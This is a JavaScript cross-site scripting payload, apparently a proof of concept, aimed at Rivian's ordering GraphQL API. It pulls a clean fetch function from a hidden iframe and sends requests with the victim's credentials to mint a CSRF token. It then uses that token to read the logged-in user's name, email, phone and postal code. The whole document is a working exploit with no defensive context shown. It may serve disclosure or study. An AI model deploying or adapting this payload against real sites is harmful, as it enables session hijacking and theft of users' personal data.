alert('XSS!!!...');
      console.log('Hacked');
      console.log('Grabbing CSRF token...');

      // grab alternative fetch that doesn't do annoying stuff
      const f = document.createElement("iframe");
      f.style.display = "none";
      document.body.appendChild(f);
      const rawFetch = f.contentWindow.fetch;

      rawFetch("https://rivian.com/api/gql/orders/graphql", {
        method: "POST",
        credentials: "include",
        headers: {
          "Content-Type": "application/json",
          "Dc-Cid": "anything"
        },
        body: JSON.stringify({
          query: "mutation createCsrfToken { createCsrfToken { csrfToken } }"
        })
      })
      .then(res => res.json())
      .then(json => {
        const csrfToken = json.data.createCsrfToken.csrfToken;
        console.log('CSRF token: ' + csrfToken);
        console.log('Now, I can do whatever I want. Calling getUserDetails...');

        return rawFetch("https://rivian.com/api/gql/orders/graphql", {
          method: "POST",
          credentials: "include",
          headers: {
            "Content-Type": "application/json",
            "Csrf-Token": csrfToken,
            "Dc-Cid": "anything"
          },
          body: JSON.stringify({
            query: "query getUserDetails { user { firstName lastName email { email } phone { countryCode number formatted } address { postalCode } } }"
          })
        });
      })
      .then(res => res.json())
      .then(json => {
        console.log(JSON.stringify(json, null, 2));
      });